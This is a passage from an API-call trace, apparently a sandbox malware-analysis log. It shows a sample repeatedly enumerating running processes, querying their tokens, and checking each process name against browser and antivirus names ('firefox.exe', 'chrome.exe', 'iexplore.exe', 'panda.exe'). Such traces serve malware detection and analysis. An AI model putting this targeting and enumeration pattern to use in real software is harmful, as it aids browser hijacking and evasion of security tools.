| out: Wow64Process=0x755fb30) returned 1 [0126.619] CloseHandle (hObject=0x634) returned 1 [0126.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x728) returned 0x634 [0126.619] IsWow64Process (in: hProcess=0x634, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0126.620] CloseHandle (hObject=0x634) returned 1 [0126.620] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x634 [0126.620] IsWow64Process (in: hProcess=0x634, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0126.620] CloseHandle (hObject=0x634) returned 1 [0126.620] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4b0) returned 0x634 [0126.620] IsWow64Process (in: hProcess=0x634, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0126.620] CloseHandle (hObject=0x634) returned 1 [0126.620] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x910) returned 0x634 [0126.621] IsWow64Process (in: hProcess=0x634, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0126.621] CloseHandle (hObject=0x634) returned 1 [0126.621] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa10) returned 0x634 [0126.621] IsWow64Process (in: hProcess=0x634, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0126.621] CloseHandle (hObject=0x634) returned 1 [0126.621] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x590) returned 0x634 [0126.621] IsWow64Process (in: hProcess=0x634, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0126.621] CloseHandle (hObject=0x634) returned 1 [0126.621] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb34) returned 0x0 [0126.622] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0126.622] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x414) returned 0x634 [0126.622] IsWow64Process (in: hProcess=0x634, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0126.622] CloseHandle (hObject=0x634) returned 1 [0126.622] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xba8) returned 0x634 [0126.622] IsWow64Process (in: hProcess=0x634, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0126.622] CloseHandle (hObject=0x634) returned 1 [0126.622] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0 [0126.623] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0126.623] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x634 [0126.623] IsWow64Process (in: hProcess=0x634, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0126.623] CloseHandle (hObject=0x634) returned 1 [0126.623] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x634 [0126.623] OpenProcessToken (in: ProcessHandle=0x634, DesiredAccess=0x8, TokenHandle=0x755fb28 | out: TokenHandle=0x755fb28*=0x660) returned 1 [0126.623] GetTokenInformation (in: TokenHandle=0x660, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x755fb14 | out: TokenInformation=0x0, ReturnLength=0x755fb14) returned 0 [0126.623] GetLastError () returned 0x7a [0126.671] GetTokenInformation (in: TokenHandle=0x660, TokenInformationClass=0x1, TokenInformation=0x54015a8, TokenInformationLength=0x24, ReturnLength=0x755fb14 | out: TokenInformation=0x54015a8, ReturnLength=0x755fb14) returned 1 [0126.672] GetTokenInformation (in: TokenHandle=0x660, TokenInformationClass=0xc, TokenInformation=0x755fb40, TokenInformationLength=0x4, ReturnLength=0x755fb2c | out: TokenInformation=0x755fb40, ReturnLength=0x755fb2c) returned 1 [0126.672] CloseHandle (hObject=0x660) returned 1 [0126.672] CloseHandle (hObject=0x634) returned 1 [0126.672] GetLengthSid (pSid=0x54015b0) returned 0x1c [0126.672] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0126.672] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0126.672] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0126.672] lstrcmpiW (lpString1="panda.exe", lpString2="svchost.exe") returned -1 [0126.673] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x3e8) returned 0x102 [0127.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x755fb5c | out: SystemInformation=0x0, ResultLength=0x755fb5c*=0x11530) returned 0xc0000004 [0127.679] VirtualAlloc (lpAddress=0x0, dwSize=0x12530, flAllocationType=0x1000, flProtect=0x4) returned 0x7860000 [0127.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x7860000, Length=0x12530, ResultLength=0x0 | out: SystemInformation=0x7860000, ResultLength=0x0) returned 0x0 [0127.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0127.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0127.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0127.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0127.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0 [0127.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0127.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x0 [0127.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0127.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0127.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0127.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x25c) returned 0x0 [0127.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x0 [0127.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0x0 [0127.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0127.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x354) returned 0x0 [0127.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0127.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x390) returned 0x0 [0127.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x274) returned 0x0 [0127.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x230) returned 0x0 [0127.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x41c) returned 0x0 [0127.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x550) returned 0x0 [0127.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2ec [0127.683] IsWow64Process (in: hProcess=0x2ec, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0127.683] CloseHandle (hObject=0x2ec) returned 1 [0127.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x728) returned 0x2ec [0127.684] IsWow64Process (in: hProcess=0x2ec, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0127.684] CloseHandle (hObject=0x2ec) returned 1 [0127.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x2ec [0127.684] IsWow64Process (in: hProcess=0x2ec, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0127.684] CloseHandle (hObject=0x2ec) returned 1 [0127.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4b0) returned 0x2ec [0127.684] IsWow64Process (in: hProcess=0x2ec, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0127.684] CloseHandle (hObject=0x2ec) returned 1 [0127.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x910) returned 0x2ec [0127.684] IsWow64Process (in: hProcess=0x2ec, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0127.684] CloseHandle (hObject=0x2ec) returned 1 [0127.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa10) returned 0x2ec [0127.684] IsWow64Process (in: hProcess=0x2ec, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0127.684] CloseHandle (hObject=0x2ec) returned 1 [0127.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x590) returned 0x2ec [0127.685] IsWow64Process (in: hProcess=0x2ec, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0127.685] CloseHandle (hObject=0x2ec) returned 1 [0127.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb34) returned 0x0 [0127.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0127.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x414) returned 0x2ec [0127.685] IsWow64Process (in: hProcess=0x2ec, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0127.685] CloseHandle (hObject=0x2ec) returned 1 [0127.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xba8) returned 0x2ec [0127.685] IsWow64Process (in: hProcess=0x2ec, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0127.685] CloseHandle (hObject=0x2ec) returned 1 [0127.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0 [0127.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0127.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2ec [0127.685] IsWow64Process (in: hProcess=0x2ec, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0127.685] CloseHandle (hObject=0x2ec) returned 1 [0127.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2ec [0127.686] OpenProcessToken (in: ProcessHandle=0x2ec, DesiredAccess=0x8, TokenHandle=0x755fb28 | out: TokenHandle=0x755fb28*=0x3b8) returned 1 [0127.686] GetTokenInformation (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x755fb14 | out: TokenInformation=0x0, ReturnLength=0x755fb14) returned 0 [0127.686] GetLastError () returned 0x7a [0127.686] GetTokenInformation (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x54020b0, TokenInformationLength=0x24, ReturnLength=0x755fb14 | out: TokenInformation=0x54020b0, ReturnLength=0x755fb14) returned 1 [0127.686] GetTokenInformation (in: TokenHandle=0x3b8, TokenInformationClass=0xc, TokenInformation=0x755fb40, TokenInformationLength=0x4, ReturnLength=0x755fb2c | out: TokenInformation=0x755fb40, ReturnLength=0x755fb2c) returned 1 [0127.686] CloseHandle (hObject=0x3b8) returned 1 [0127.686] CloseHandle (hObject=0x2ec) returned 1 [0127.686] GetLengthSid (pSid=0x54020b8) returned 0x1c [0127.687] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0127.687] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0127.687] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0127.687] lstrcmpiW (lpString1="panda.exe", lpString2="svchost.exe") returned -1 [0127.687] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x3e8) returned 0x102 [0128.690] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x755fb5c | out: SystemInformation=0x0, ResultLength=0x755fb5c*=0x11490) returned 0xc0000004 [0128.690] VirtualAlloc (lpAddress=0x0, dwSize=0x12490, flAllocationType=0x1000, flProtect=0x4) returned 0x7860000 [0128.691] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x7860000, Length=0x12490, ResultLength=0x0 | out: SystemInformation=0x7860000, ResultLength=0x0) returned 0x0 [0128.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0128.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0128.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0128.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0 [0128.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0128.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x0 [0128.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0128.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0128.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0128.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x25c) returned 0x0 [0128.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x0 [0128.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0x0 [0128.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0128.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x354) returned 0x0 [0128.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0128.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x390) returned 0x0 [0128.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x274) returned 0x0 [0128.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x230) returned 0x0 [0128.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x41c) returned 0x0 [0128.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x550) returned 0x0 [0128.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2f0 [0128.703] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0128.703] CloseHandle (hObject=0x2f0) returned 1 [0128.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x728) returned 0x2f0 [0128.704] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0128.704] CloseHandle (hObject=0x2f0) returned 1 [0128.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x2f0 [0128.704] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0128.704] CloseHandle (hObject=0x2f0) returned 1 [0128.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4b0) returned 0x2f0 [0128.704] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0128.704] CloseHandle (hObject=0x2f0) returned 1 [0128.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x910) returned 0x2f0 [0128.705] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0128.705] CloseHandle (hObject=0x2f0) returned 1 [0128.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa10) returned 0x2f0 [0128.705] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0128.705] CloseHandle (hObject=0x2f0) returned 1 [0128.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x590) returned 0x2f0 [0128.705] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0128.705] CloseHandle (hObject=0x2f0) returned 1 [0128.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb34) returned 0x0 [0128.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0128.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x414) returned 0x2f0 [0128.706] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0128.706] CloseHandle (hObject=0x2f0) returned 1 [0128.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xba8) returned 0x2f0 [0128.706] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0128.706] CloseHandle (hObject=0x2f0) returned 1 [0128.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0 [0128.707] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0128.707] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0128.707] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0128.707] CloseHandle (hObject=0x2f0) returned 1 [0128.707] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0128.707] OpenProcessToken (in: ProcessHandle=0x2f0, DesiredAccess=0x8, TokenHandle=0x755fb28 | out: TokenHandle=0x755fb28*=0x2ec) returned 1 [0128.707] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x755fb14 | out: TokenInformation=0x0, ReturnLength=0x755fb14) returned 0 [0128.707] GetLastError () returned 0x7a [0128.707] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x54010a0, TokenInformationLength=0x24, ReturnLength=0x755fb14 | out: TokenInformation=0x54010a0, ReturnLength=0x755fb14) returned 1 [0128.708] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0xc, TokenInformation=0x755fb40, TokenInformationLength=0x4, ReturnLength=0x755fb2c | out: TokenInformation=0x755fb40, ReturnLength=0x755fb2c) returned 1 [0128.708] CloseHandle (hObject=0x2ec) returned 1 [0128.708] CloseHandle (hObject=0x2f0) returned 1 [0128.708] GetLengthSid (pSid=0x54010a8) returned 0x1c [0128.708] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0128.708] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0128.708] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0128.708] lstrcmpiW (lpString1="panda.exe", lpString2="svchost.exe") returned -1 [0128.709] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x3e8) returned 0x102 [0129.719] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x755fb5c | out: SystemInformation=0x0, ResultLength=0x755fb5c*=0x11490) returned 0xc0000004 [0129.720] VirtualAlloc (lpAddress=0x0, dwSize=0x12490, flAllocationType=0x1000, flProtect=0x4) returned 0x7860000 [0129.720] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x7860000, Length=0x12490, ResultLength=0x0 | out: SystemInformation=0x7860000, ResultLength=0x0) returned 0x0 [0129.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0129.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0129.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0129.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0129.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0 [0129.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0129.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x0 [0129.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0129.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0129.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0129.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x25c) returned 0x0 [0129.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x0 [0129.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0x0 [0129.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0129.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x354) returned 0x0 [0129.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0129.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x390) returned 0x0 [0129.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x274) returned 0x0 [0129.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x230) returned 0x0 [0129.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x41c) returned 0x0 [0129.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x550) returned 0x0 [0129.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2f0 [0129.726] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0129.727] CloseHandle (hObject=0x2f0) returned 1 [0129.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x728) returned 0x2f0 [0129.727] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0129.727] CloseHandle (hObject=0x2f0) returned 1 [0129.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x2f0 [0129.727] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0129.727] CloseHandle (hObject=0x2f0) returned 1 [0129.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4b0) returned 0x2f0 [0129.728] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0129.728] CloseHandle (hObject=0x2f0) returned 1 [0129.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x910) returned 0x2f0 [0129.728] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0129.728] CloseHandle (hObject=0x2f0) returned 1 [0129.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa10) returned 0x2f0 [0129.728] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0129.728] CloseHandle (hObject=0x2f0) returned 1 [0129.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x590) returned 0x2f0 [0129.729] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0129.729] CloseHandle (hObject=0x2f0) returned 1 [0129.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb34) returned 0x0 [0129.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0129.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x414) returned 0x2f0 [0129.729] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0129.729] CloseHandle (hObject=0x2f0) returned 1 [0129.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xba8) returned 0x2f0 [0129.730] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0129.730] CloseHandle (hObject=0x2f0) returned 1 [0129.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0 [0129.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0129.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0129.730] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0129.730] CloseHandle (hObject=0x2f0) returned 1 [0129.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0129.730] OpenProcessToken (in: ProcessHandle=0x2f0, DesiredAccess=0x8, TokenHandle=0x755fb28 | out: TokenHandle=0x755fb28*=0x2ec) returned 1 [0129.731] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x755fb14 | out: TokenInformation=0x0, ReturnLength=0x755fb14) returned 0 [0129.731] GetLastError () returned 0x7a [0129.731] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x54010a0, TokenInformationLength=0x24, ReturnLength=0x755fb14 | out: TokenInformation=0x54010a0, ReturnLength=0x755fb14) returned 1 [0129.731] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0xc, TokenInformation=0x755fb40, TokenInformationLength=0x4, ReturnLength=0x755fb2c | out: TokenInformation=0x755fb40, ReturnLength=0x755fb2c) returned 1 [0129.731] CloseHandle (hObject=0x2ec) returned 1 [0129.731] CloseHandle (hObject=0x2f0) returned 1 [0129.731] GetLengthSid (pSid=0x54010a8) returned 0x1c [0129.731] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0129.732] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0129.732] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0129.732] lstrcmpiW (lpString1="panda.exe", lpString2="svchost.exe") returned -1 [0129.732] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x3e8) returned 0x102 [0130.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x755fb5c | out: SystemInformation=0x0, ResultLength=0x755fb5c*=0x11490) returned 0xc0000004 [0130.727] VirtualAlloc (lpAddress=0x0, dwSize=0x12490, flAllocationType=0x1000, flProtect=0x4) returned 0x7860000 [0130.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x7860000, Length=0x12490, ResultLength=0x0 | out: SystemInformation=0x7860000, ResultLength=0x0) returned 0x0 [0130.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0130.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0130.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0130.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0130.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0 [0130.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0130.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x0 [0130.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, 